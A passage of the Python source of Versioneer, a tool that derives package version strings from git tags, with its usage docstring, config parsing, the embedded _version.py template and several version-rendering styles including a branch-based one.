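As a concrete illustration (a minimal sketch: `get_versions()` is the\ndocumented entry point, but the abort policy shown is just one possible\nchoice), a `setup.py` can fail fast instead of shipping an ""unknown""\nversion:\n\n import versioneer\n\n info = versioneer.get_versions()\n if info[\'error\'] is not None:\n raise SystemExit(\'version lookup failed: \' + info[\'error\'])\n print(\'building version \' + info[\'version\'])\n\n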
`version` is suitable for display in an ""about"" box or a CLI\n`--version` output: it can be easily compared against release notes and lists\nof bugs fixed in various releases.\n\nThe installer adds the following text to your `__init__.py` to place a basic\nversion in `YOURPROJECT.__version__`:\n\n from ._version import get_versions\n __version__ = get_versions()[\'version\']\n del get_versions\n\n## Styles\n\nThe setup.cfg `style=` configuration controls how the VCS information is\nrendered into a version string.\n\nThe default style, ""pep440"", produces a PEP440-compliant string, equal to the\nun-prefixed tag name for actual releases, and containing an additional ""local\nversion"" section with more detail for in-between builds. For Git, this is\nTAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags\n--dirty --always`. For example ""0.11+2.g1076c97.dirty"" indicates that the\ntree is like the ""1076c97"" commit but has uncommitted changes ("".dirty""), and\nthat this commit is two revisions (""+2"") beyond the ""0.11"" tag. For released\nsoftware (exactly equal to a known tag), the identifier will only contain the\nstripped tag, e.g. ""0.11"".\n\nOther styles are available. See details.md in the Versioneer source tree for\ndescriptions.\n\n## Debugging\n\nVersioneer tries to avoid fatal errors: if something goes wrong, it will tend\nto return a version of ""0+unknown"". To investigate the problem, run `setup.py\nversion`, which will run the version-lookup code in a verbose mode, and will\ndisplay the full contents of `get_versions()` (including the `error` string,\nwhich may help identify what went wrong).\n\n## Updating Versioneer\n\nTo upgrade your project to a new release of Versioneer, do the following:\n\n* install the new Versioneer (`pip install -U versioneer` or equivalent)\n* edit `setup.cfg`, if necessary, to include any new configuration settings\n indicated by the release notes\n* re-run `versioneer install` in your source tree, to replace\n `SRC/_version.py`\n* commit any changed files\n\n### Upgrading to 0.15\n\nStarting with this version, Versioneer is configured with a `[versioneer]`\nsection in your `setup.cfg` file. Earlier versions required the `setup.py` to\nset attributes on the `versioneer` module immediately after import. The new\nversion will refuse to run (raising an exception during import) until you\nhave provided the necessary `setup.cfg` section.\n\nIn addition, the Versioneer package provides an executable named\n`versioneer`, and the installation process is driven by running `versioneer\ninstall`. In 0.14 and earlier, the executable was named\n`versioneer-installer` and was run without an argument.\n\n### Upgrading to 0.14\n\n0.14 changes the format of the version string. 0.13 and earlier used\nhyphen-separated strings like ""0.11-2-g1076c97-dirty"". 0.14 and beyond use a\nplus-separated ""local version"" section strings, with dot-separated\ncomponents, like ""0.11+2.g1076c97"". PEP440-strict tools did not like the old\nformat, but should be ok with the new one.\n\n### Upgrading from 0.11 to 0.12\n\nNothing special.\n\n### Upgrading from 0.10 to 0.11\n\nYou must add a `versioneer.VCS = ""git""` to your `setup.py` before re-running\n`setup.py setup_versioneer`. This will enable the use of additional\nversion-control systems (SVN, etc) in the future.\n\n## Future Directions\n\nThis tool is designed to make it easily extended to other version-control\nsystems: all VCS-specific components are in separate directories like\nsrc/git/ . 
The top-level `versioneer.py` script is assembled from these\ncomponents by running make-versioneer.py . In the future, make-versioneer.py\nwill take a VCS name as an argument, and will construct a version of\n`versioneer.py` that is specific to the given VCS. It might also take the\nconfiguration arguments that are currently provided manually during\ninstallation by editing setup.py . Alternatively, it might go the other\ndirection and include code from all supported VCS systems, reducing the\nnumber of intermediate scripts.\n\n\n## License\n\nTo make Versioneer easier to embed, all its code is dedicated to the public\ndomain. The `_version.py` that it creates is also in the public domain.\nSpecifically, both are released under the Creative Commons ""Public Domain\nDedication"" license (CC0-1.0), as described in\nhttps://creativecommons.org/publicdomain/zero/1.0/ .\n\n""""""\n\nfrom __future__ import print_function\ntry:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\nimport errno\nimport json\nimport os\nimport re\nimport subprocess\nimport sys\n\n\nclass VersioneerConfig:\n\n """"""Container for Versioneer configuration parameters.""""""\n\n\ndef get_root():\n """"""Get the project root directory.\n\n We require that all commands are run from the project root, i.e. the\n directory that contains setup.py, setup.cfg, and versioneer.py .\n """"""\n root = os.path.realpath(os.path.abspath(os.getcwd()))\n setup_py = os.path.join(root, ""setup.py"")\n versioneer_py = os.path.join(root, ""versioneer.py"")\n if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):\n # allow \'python path/to/setup.py COMMAND\'\n root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))\n setup_py = os.path.join(root, ""setup.py"")\n versioneer_py = os.path.join(root, ""versioneer.py"")\n if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):\n err = (""Versioneer was unable to run the project root directory. ""\n ""Versioneer requires setup.py to be executed from ""\n ""its immediate directory (like \'python setup.py COMMAND\'), ""\n ""or in a way that lets it use sys.argv[0] to find the root ""\n ""(like \'python path/to/setup.py COMMAND\')."")\n raise VersioneerBadRootError(err)\n try:\n # Certain runtime workflows (setup.py install/develop in a setuptools\n # tree) execute all dependencies in a single python process, so\n # ""versioneer"" may be imported multiple times, and python\'s shared\n # module-import table will cache the first one. So we can\'t use\n # os.path.dirname(__file__), as that will find whichever\n # versioneer.py was first imported, even in later projects.\n me = os.path.realpath(os.path.abspath(__file__))\n if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]:\n print(""Warning: build in %s is using versioneer.py from %s""\n % (os.path.dirname(me), versioneer_py))\n except NameError:\n pass\n return root\n\n\ndef get_config_from_root(root):\n """"""Read the project setup.cfg file to determine Versioneer config.""""""\n # This might raise EnvironmentError (if setup.cfg is missing), or\n # configparser.NoSectionError (if it lacks a [versioneer] section), or\n # configparser.NoOptionError (if it lacks ""VCS=""). 
See the docstring at\n # the top of versioneer.py for instructions on writing your setup.cfg .\n setup_cfg = os.path.join(root, ""setup.cfg"")\n parser = configparser.SafeConfigParser()\n with open(setup_cfg, ""r"") as f:\n parser.readfp(f)\n VCS = parser.get(""versioneer"", ""VCS"") # mandatory\n\n def get(parser, name):\n if parser.has_option(""versioneer"", name):\n return parser.get(""versioneer"", name)\n return None\n cfg = VersioneerConfig()\n cfg.VCS = VCS\n cfg.style = get(parser, ""style"") or """"\n cfg.versionfile_source = get(parser, ""versionfile_source"")\n cfg.versionfile_build = get(parser, ""versionfile_build"")\n cfg.tag_prefix = get(parser, ""tag_prefix"")\n if cfg.tag_prefix in (""\'\'"", \'""""\'):\n cfg.tag_prefix = """"\n cfg.parentdir_prefix = get(parser, ""parentdir_prefix"")\n cfg.verbose = get(parser, ""verbose"")\n return cfg\n\n\nclass NotThisMethod(Exception):\n\n """"""Exception raised if a method is not valid for the current scenario.""""""\n\n# these dictionaries contain VCS-specific tools\nLONG_VERSION_PY = {}\nHANDLERS = {}\n\n\ndef register_vcs_handler(vcs, method): # decorator\n """"""Decorator to mark a method as the handler for a particular VCS.""""""\n def decorate(f):\n """"""Store f in HANDLERS[vcs][method].""""""\n if vcs not in HANDLERS:\n HANDLERS[vcs] = {}\n HANDLERS[vcs][method] = f\n return f\n return decorate\n\n\ndef run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):\n """"""Call the given command(s).""""""\n assert isinstance(commands, list)\n p = None\n for c in commands:\n try:\n dispcmd = str([c] + args)\n # remember shell=False, so use git.cmd on windows, not just git\n p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,\n stderr=(subprocess.PIPE if hide_stderr\n else None))\n break\n except EnvironmentError:\n e = sys.exc_info()[1]\n if e.errno == errno.ENOENT:\n continue\n if verbose:\n print(""unable to run %s"" % dispcmd)\n print(e)\n return None\n else:\n if verbose:\n print(""unable to find command, tried %s"" % (commands,))\n return None\n stdout = p.communicate()[0].strip()\n if sys.version_info[0] >= 3:\n stdout = stdout.decode()\n if p.returncode != 0:\n if verbose:\n print(""unable to run %s (error)"" % dispcmd)\n return None\n return stdout\nLONG_VERSION_PY[\'git\'] = r\'\'\'\n# This file helps to compute a version number in source trees obtained from\n# git-archive tarball (such as those provided by githubs download-from-tag\n# feature). Distribution tarballs (built by setup.py sdist) and build\n# directories (produced by setup.py build) will contain a much shorter file\n# that just contains the computed version number.\n\n# This file is released into the public domain. Generated by\n# versioneer-0.15+dev (https://github.com/warner/python-versioneer)\n\n""""""Git implementation of _version.py.""""""\n\nimport errno\nimport os\nimport re\nimport subprocess\nimport sys\n\n\ndef get_keywords():\n """"""Get the keywords needed to look up the version information.""""""\n # these strings will be replaced by git during git-archive.\n # setup.py/versioneer.py will grep for the variable names, so they must\n # each be defined on a line of their own. 
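After git-archive expands them, git_refnames\n # holds the ref decoration of the archived commit (something like\n # "" (HEAD -> master, tag: v1.0)"") and git_full holds the full\n # 40-character commit hash. 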
_version.py will just call\n # get_keywords().\n git_refnames = ""%(DOLLAR)sFormat:%%d%(DOLLAR)s""\n git_full = ""%(DOLLAR)sFormat:%%H%(DOLLAR)s""\n keywords = {""refnames"": git_refnames, ""full"": git_full}\n return keywords\n\n\nclass VersioneerConfig:\n\n """"""Container for Versioneer configuration parameters.""""""\n\n\ndef get_config():\n """"""Create, populate and return the VersioneerConfig() object.""""""\n # these strings are filled in when \'setup.py versioneer\' creates\n # _version.py\n cfg = VersioneerConfig()\n cfg.VCS = ""git""\n cfg.style = ""%(STYLE)s""\n cfg.tag_prefix = ""%(TAG_PREFIX)s""\n cfg.parentdir_prefix = ""%(PARENTDIR_PREFIX)s""\n cfg.versionfile_source = ""%(VERSIONFILE_SOURCE)s""\n cfg.verbose = False\n return cfg\n\n\nclass NotThisMethod(Exception):\n\n """"""Exception raised if a method is not valid for the current scenario.""""""\n\n\nLONG_VERSION_PY = {}\nHANDLERS = {}\n\n\ndef register_vcs_handler(vcs, method): # decorator\n """"""Decorator to mark a method as the handler for a particular VCS.""""""\n def decorate(f):\n """"""Store f in HANDLERS[vcs][method].""""""\n if vcs not in HANDLERS:\n HANDLERS[vcs] = {}\n HANDLERS[vcs][method] = f\n return f\n return decorate\n\n\ndef run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):\n """"""Call the given command(s).""""""\n assert isinstance(commands, list)\n p = None\n for c in commands:\n try:\n dispcmd = str([c] + args)\n # remember shell=False, so use git.cmd on windows, not just git\n p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,\n stderr=(subprocess.PIPE if hide_stderr\n else None))\n break\n except EnvironmentError:\n e = sys.exc_info()[1]\n if e.errno == errno.ENOENT:\n continue\n if verbose:\n print(""unable to run %%s"" %% dispcmd)\n print(e)\n return None\n else:\n if verbose:\n print(""unable to find command, tried %%s"" %% (commands,))\n return None\n stdout = p.communicate()[0].strip()\n if sys.version_info[0] >= 3:\n stdout = stdout.decode()\n if p.returncode != 0:\n if verbose:\n print(""unable to run %%s (error)"" %% dispcmd)\n return None\n return stdout\n\n\ndef versions_from_parentdir(parentdir_prefix, root, verbose):\n """"""Try to determine the version from the parent directory name.\n\n Source tarballs conventionally unpack into a directory that includes\n both the project name and a version string.\n """"""\n dirname = os.path.basename(root)\n if not dirname.startswith(parentdir_prefix):\n if verbose:\n print(""guessing rootdir is \'%%s\', but \'%%s\' doesn\'t start with ""\n ""prefix \'%%s\'"" %% (root, dirname, parentdir_prefix))\n raise NotThisMethod(""rootdir doesn\'t start with parentdir_prefix"")\n return {""version"": dirname[len(parentdir_prefix):],\n ""full-revisionid"": None,\n ""dirty"": False, ""error"": None}\n\n\n@register_vcs_handler(""git"", ""get_keywords"")\ndef git_get_keywords(versionfile_abs):\n """"""Extract version information from the given file.""""""\n # the code embedded in _version.py can just fetch the value of these\n # keywords. When used from setup.py, we don\'t want to import _version.py,\n # so we do it with a regexp instead. 
This function is not used from\n # _version.py.\n keywords = {}\n try:\n f = open(versionfile_abs, ""r"")\n for line in f.readlines():\n if line.strip().startswith(""git_refnames =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""refnames""] = mo.group(1)\n if line.strip().startswith(""git_full =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""full""] = mo.group(1)\n f.close()\n except EnvironmentError:\n pass\n return keywords\n\n\n@register_vcs_handler(""git"", ""keywords"")\ndef git_versions_from_keywords(keywords, tag_prefix, verbose):\n """"""Get version information from git keywords.""""""\n if not keywords:\n raise NotThisMethod(""no keywords at all, weird"")\n refnames = keywords[""refnames""].strip()\n if refnames.startswith(""$Format""):\n if verbose:\n print(""keywords are unexpanded, not using"")\n raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")\n refs = [r.strip() for r in refnames.strip(""()"").split("","")]\n # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of\n # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.\n TAG = ""tag: ""\n tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])\n if not tags:\n # Either we\'re using git < 1.8.3, or there really are no tags. We use\n # a heuristic: assume all version tags have a digit. The old git %%d\n # expansion behaves like git log --decorate=short and strips out the\n # refs/heads/ and refs/tags/ prefixes that would let us distinguish\n # between branches and tags. By ignoring refnames without digits, we\n # filter out many common branch names like ""release"" and\n # ""stabilization"", as well as ""HEAD"" and ""master"".\n tags = set([r for r in refs if re.search(r\'\\d\', r)])\n if verbose:\n print(""discarding \'%%s\', no digits"" %% "","".join(set(refs) - tags))\n if verbose:\n print(""likely tags: %%s"" %% "","".join(sorted(tags)))\n for ref in sorted(tags):\n # sorting will prefer e.g. ""2.0"" over ""2.0rc1""\n if ref.startswith(tag_prefix):\n r = ref[len(tag_prefix):]\n if verbose:\n print(""picking %%s"" %% r)\n return {""version"": r,\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": None, ""branch"": None\n }\n # no suitable tags, so version is ""0+unknown"", but full hex is still there\n if verbose:\n print(""no suitable tags, using unknown + full revision id"")\n return {""version"": ""0+unknown"",\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": ""no suitable tags"",\n ""branch"": None}\n\n\n@register_vcs_handler(""git"", ""pieces_from_vcs"")\ndef git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):\n """"""Get version from \'git describe\' in the root of the source tree.\n\n This only gets called if the git-archive \'subst\' keywords were *not*\n expanded, and _version.py hasn\'t already been rewritten with a short\n version string, meaning we\'re inside a checked out source tree.\n """"""\n if not os.path.exists(os.path.join(root, "".git"")):\n if verbose:\n print(""no .git in %%s"" %% root)\n raise NotThisMethod(""no .git directory"")\n\n GITS = [""git""]\n if sys.platform == ""win32"":\n GITS = [""git.cmd"", ""git.exe""]\n # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]\n # if there isn\'t one, this yields HEX[-dirty] (no NUM). 
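For example,\n # ""0.11-2-g1076c97-dirty"" means two commits past tag ""0.11"", at short\n # revision 1076c97, with uncommitted local changes. 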
Note, for git v1.7\n # and below, it is necessary to run ""git update-index --refresh"" first.\n describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",\n ""--always"", ""--long"",\n ""--match"", ""%%s*"" %% tag_prefix],\n cwd=root)\n # --long was added in git-1.5.5\n if describe_out is None:\n raise NotThisMethod(""\'git describe\' failed"")\n describe_out = describe_out.strip()\n full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)\n if full_out is None:\n raise NotThisMethod(""\'git rev-parse\' failed"")\n full_out = full_out.strip()\n\n pieces = {}\n pieces[""long""] = full_out\n pieces[""short""] = full_out[:7] # maybe improved later\n pieces[""error""] = None\n\n # abbrev-ref available with git >= 1.7\n branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],\n cwd=root).strip()\n if branch_name == \'HEAD\':\n branches = run_command(GITS, [""branch"", ""--contains""],\n cwd=root).split(\'\\n\')\n branches = [branch[2:] for branch in branches if branch[4:5] != \'(\']\n if \'master\' in branches:\n branch_name = \'master\'\n elif not branches:\n branch_name = None\n else:\n # Pick the first branch that is returned. Good or bad.\n branch_name = branches[0]\n\n pieces[\'branch\'] = branch_name\n\n # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]\n # TAG might have hyphens.\n git_describe = describe_out\n\n # look for -dirty suffix\n dirty = git_describe.endswith(""-dirty"")\n pieces[""dirty""] = dirty\n if dirty:\n git_describe = git_describe[:git_describe.rindex(""-dirty"")]\n\n # now we have TAG-NUM-gHEX or HEX\n\n if ""-"" in git_describe:\n # TAG-NUM-gHEX\n mo = re.search(r\'^(.+)-(\\d+)-g([0-9a-f]+)$\', git_describe)\n if not mo:\n # unparseable. Maybe git-describe is misbehaving?\n pieces[""error""] = (""unable to parse git-describe output: \'%%s\'""\n %% describe_out)\n return pieces\n\n # tag\n full_tag = mo.group(1)\n if not full_tag.startswith(tag_prefix):\n if verbose:\n fmt = ""tag \'%%s\' doesn\'t start with prefix \'%%s\'""\n print(fmt %% (full_tag, tag_prefix))\n pieces[""error""] = (""tag \'%%s\' doesn\'t start with prefix \'%%s\'""\n %% (full_tag, tag_prefix))\n return pieces\n pieces[""closest-tag""] = full_tag[len(tag_prefix):]\n\n # distance: number of commits since tag\n pieces[""distance""] = int(mo.group(2))\n\n # commit: short hex revision ID\n pieces[""short""] = mo.group(3)\n\n else:\n # HEX: no tags\n pieces[""closest-tag""] = None\n count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],\n cwd=root)\n pieces[""distance""] = int(count_out) # total number of commits\n\n return pieces\n\n\n# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.\ndefault_maint_branch_regexp = "".*([0-9]+\\.)+x$""\n\n\ndef plus_or_dot(pieces):\n """"""Return a + if we don\'t already have one, else return a .""""""\n if ""+"" in pieces.get(""closest-tag"", """"):\n return "".""\n return ""+""\n\n\ndef render_pep440(pieces):\n """"""Build up version string, with post-release ""local version identifier"".\n\n Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you\n get a tagged build and then dirty it, you\'ll get TAG+0.gHEX.dirty\n\n Exceptions:\n 1: no tags. git_describe was just HEX. 
0+untagged.DISTANCE.gHEX[.dirty]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += plus_or_dot(pieces)\n rendered += ""%%d.g%%s"" %% (pieces[""distance""], pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n else:\n # exception #1\n rendered = ""0+untagged.%%d.g%%s"" %% (pieces[""distance""],\n pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n return rendered\n\n\ndef render_pep440_pre(pieces):\n """"""TAG[.post.devDISTANCE] -- No -dirty.\n\n Exceptions:\n 1: no tags. 0.post.devDISTANCE\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post.dev%%d"" %% pieces[""distance""]\n else:\n # exception #1\n rendered = ""0.post.dev%%d"" %% pieces[""distance""]\n return rendered\n\n\ndef render_pep440_post(pieces):\n """"""TAG[.postDISTANCE[.dev0]+gHEX] .\n\n The "".dev0"" means dirty. Note that .dev0 sorts backwards\n (a dirty tree will appear ""older"" than the corresponding clean one),\n but you shouldn\'t be releasing software with -dirty anyways.\n\n Exceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += plus_or_dot(pieces)\n rendered += ""g%%s"" %% pieces[""short""]\n else:\n # exception #1\n rendered = ""0.post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += ""+g%%s"" %% pieces[""short""]\n return rendered\n\n\ndef render_pep440_old(pieces):\n """"""TAG[.postDISTANCE[.dev0]] .\n\n The "".dev0"" means dirty.\n\n Eexceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n else:\n # exception #1\n rendered = ""0.post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n return rendered\n\n\ndef render_git_describe(pieces):\n """"""TAG[-DISTANCE-gHEX][-dirty].\n\n Like \'git describe --tags --dirty --always\'.\n\n Exceptions:\n 1: no tags. HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef render_git_describe_long(pieces):\n """"""TAG-DISTANCE-gHEX[-dirty].\n\n Like \'git describe --tags --dirty --always -long\'.\n The distance/hash is unconditional.\n\n Exceptions:\n 1: no tags. 
HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef add_one_to_version(version_string, number_index_to_increment=-1):\n """"""\n Add one to a version string at the given numeric indices.\n\n >>> add_one_to_version(\'v1.2.3\')\n \'v1.2.4\'\n\n """"""\n # Break up the tag by number groups (preserving multi-digit\n # numbers as multidigit)\n parts = re.split(""([0-9]+)"", version_string)\n\n digit_parts = [(i, part) for i, part in enumerate(parts)\n if part.isdigit()]\n\n # Deal with negative indexing.\n increment_at_index = ((number_index_to_increment + len(digit_parts))\n %% len(digit_parts))\n for n_seen, (i, part) in enumerate(digit_parts):\n if n_seen == increment_at_index:\n parts[i] = str(int(part) + 1)\n elif n_seen > increment_at_index:\n parts[i] = \'0\'\n return \'\'.join(parts)\n\n\ndef render_pep440_branch_based(pieces):\n # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is\n # included for dirty.\n\n # exceptions:\n # 1: no tags. 0.0.0.devDISTANCE[+gHEX]\n\n replacements = {\' \': \'.\', \'(\': \'\', \')\': \'\'}\n [branch_name] = [pieces.get(\'branch\').replace(old, new)\n for old, new in replacements.items()]\n master = branch_name == \'master\'\n maint = re.match(default_maint_branch_regexp,\n branch_name or \'\')\n\n # If we are on a tag, just pep440-pre it.\n if pieces[""closest-tag""] and not (pieces[""distance""] or\n pieces[""dirty""]):\n rendered = pieces[""closest-tag""]\n else:\n # Put a default closest-tag in.\n if not pieces[""closest-tag""]:\n pieces[""closest-tag""] = \'0.0.0\'\n\n if pieces[""distance""] or pieces[""dirty""]:\n if maint:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post%%d"" %% pieces[""distance""]\n else:\n rendered = add_one_to_version(pieces[""closest-tag""])\n if pieces[""distance""]:\n rendered += "".dev%%d"" %% pieces[""distance""]\n\n suffix = []\n # Put the branch name in if it isn\'t master nor a\n # maintenance branch.\n if not (master or maint):\n suffix.append(\'%%s\' %% (branch_name or \'unknown_branch\'))\n\n if pieces[""dirty""]:\n suffix.append(\'g%%s\' %% pieces[""short""])\n rendered += \'+%%s\' %% \'\'.join(suffix)\n else:\n rendered = pieces[""closest-tag""]\n return rendered\n\n\nSTYLES = {\'default\': render_pep440,\n \'pep440\': render_pep440,\n \'pep440-pre\': render_pep440_pre,\n \'pep440-post\': render_pep440_post,\n \'pep440-old\': render_pep440_old,\n \'git-describe\': render_git_describe,\n \'git-describe-long\': render_git_describe_long,\n \'pep440-old\': render_pep440_old,\n \'pep440-branch-based\': render_pep440_branch_based,\n }\n\n\ndef render(pieces, style):\n """"""Render the given version pieces into the requested style.""""""\n if pieces[""error""]:\n return {""version"": ""unknown"",\n ""full-revisionid"": pieces.get(""long""),\n ""dirty"": None,\n ""error"": pieces[""error""]}\n\n if not style:\n style = \'default\'\n\n renderer = STYLES.get(style)\n\n if not renderer:\n raise ValueError(""unknown style \'%%s\'"" %% style)\n\n rendered = renderer(pieces)\n\n return {""version"": rendered, ""full-revisionid"": pieces[""long""],\n ""dirty"": pieces[""dirty""], ""error"": None}\n\n\ndef get_versions():\n """"""Get version information or return default if unable to do so.""""""\n # I am in _version.py, 
which lives at ROOT/VERSIONFILE_SOURCE. If we have\n # __file__, we can work backwards from there to the root. Some\n # py2exe/bbfreeze/non-CPython implementations don\'t do __file__, in which\n # case we can only use expanded keywords.\n\n cfg = get_config()\n verbose = cfg.verbose\n\n try:\n return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,\n verbose)\n except NotThisMethod:\n pass\n\n try:\n root = os.path.realpath(__file__)\n # versionfile_source is the relative path from the top of the source\n # tree (where the .git directory might live) to this file. Invert\n # this to find the root from __file__.\n for i in cfg.versionfile_source.split(\'/\'):\n root = os.path.dirname(root)\n except NameError:\n return {""version"": ""0+unknown"", ""full-revisionid"": None,\n ""dirty"": None,\n ""error"": ""unable to find root of source tree""}\n\n try:\n pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)\n return render(pieces, cfg.style)\n except NotThisMethod:\n pass\n\n try:\n if cfg.parentdir_prefix:\n return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)\n except NotThisMethod:\n pass\n\n return {""version"": ""0+unknown"", ""full-revisionid"": None,\n ""dirty"": None,\n ""error"": ""unable to compute version""}\n\'\'\'\n\n\n@register_vcs_handler(""git"", ""get_keywords"")\ndef git_get_keywords(versionfile_abs):\n """"""Extract version information from the given file.""""""\n # the code embedded in _version.py can just fetch the value of these\n # keywords. When used from setup.py, we don\'t want to import _version.py,\n # so we do it with a regexp instead. This function is not used from\n # _version.py.\n keywords = {}\n try:\n f = open(versionfile_abs, ""r"")\n for line in f.readlines():\n if line.strip().startswith(""git_refnames =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""refnames""] = mo.group(1)\n if line.strip().startswith(""git_full =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""full""] = mo.group(1)\n f.close()\n except EnvironmentError:\n pass\n return keywords\n\n\n@register_vcs_handler(""git"", ""keywords"")\ndef git_versions_from_keywords(keywords, tag_prefix, verbose):\n """"""Get version information from git keywords.""""""\n if not keywords:\n raise NotThisMethod(""no keywords at all, weird"")\n refnames = keywords[""refnames""].strip()\n if refnames.startswith(""$Format""):\n if verbose:\n print(""keywords are unexpanded, not using"")\n raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")\n refs = [r.strip() for r in refnames.strip(""()"").split("","")]\n # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of\n # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.\n TAG = ""tag: ""\n tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])\n if not tags:\n # Either we\'re using git < 1.8.3, or there really are no tags. We use\n # a heuristic: assume all version tags have a digit. The old git %d\n # expansion behaves like git log --decorate=short and strips out the\n # refs/heads/ and refs/tags/ prefixes that would let us distinguish\n # between branches and tags. 
By ignoring refnames without digits, we\n # filter out many common branch names like ""release"" and\n # ""stabilization"", as well as ""HEAD"" and ""master"".\n tags = set([r for r in refs if re.search(r\'\\d\', r)])\n if verbose:\n print(""discarding \'%s\', no digits"" % "","".join(set(refs) - tags))\n if verbose:\n print(""likely tags: %s"" % "","".join(sorted(tags)))\n for ref in sorted(tags):\n # sorting will prefer e.g. ""2.0"" over ""2.0rc1""\n if ref.startswith(tag_prefix):\n r = ref[len(tag_prefix):]\n if verbose:\n print(""picking %s"" % r)\n return {""version"": r,\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": None, ""branch"": None\n }\n # no suitable tags, so version is ""0+unknown"", but full hex is still there\n if verbose:\n print(""no suitable tags, using unknown + full revision id"")\n return {""version"": ""0+unknown"",\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": ""no suitable tags"",\n ""branch"": None}\n\n\n@register_vcs_handler(""git"", ""pieces_from_vcs"")\ndef git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):\n """"""Get version from \'git describe\' in the root of the source tree.\n\n This only gets called if the git-archive \'subst\' keywords were *not*\n expanded, and _version.py hasn\'t already been rewritten with a short\n version string, meaning we\'re inside a checked out source tree.\n """"""\n if not os.path.exists(os.path.join(root, "".git"")):\n if verbose:\n print(""no .git in %s"" % root)\n raise NotThisMethod(""no .git directory"")\n\n GITS = [""git""]\n if sys.platform == ""win32"":\n GITS = [""git.cmd"", ""git.exe""]\n # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]\n # if there isn\'t one, this yields HEX[-dirty] (no NUM). Note, for git v1.7\n # and below, it is necessary to run ""git update-index --refresh"" first.\n describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",\n ""--always"", ""--long"",\n ""--match"", ""%s*"" % tag_prefix],\n cwd=root)\n # --long was added in git-1.5.5\n if describe_out is None:\n raise NotThisMethod(""\'git describe\' failed"")\n describe_out = describe_out.strip()\n full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)\n if full_out is None:\n raise NotThisMethod(""\'git rev-parse\' failed"")\n full_out = full_out.strip()\n\n pieces = {}\n pieces[""long""] = full_out\n pieces[""short""] = full_out[:7] # maybe improved later\n pieces[""error""] = None\n\n # abbrev-ref available with git >= 1.7\n branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],\n cwd=root).strip()\n if branch_name == \'HEAD\':\n branches = run_command(GITS, [""branch"", ""--contains""],\n 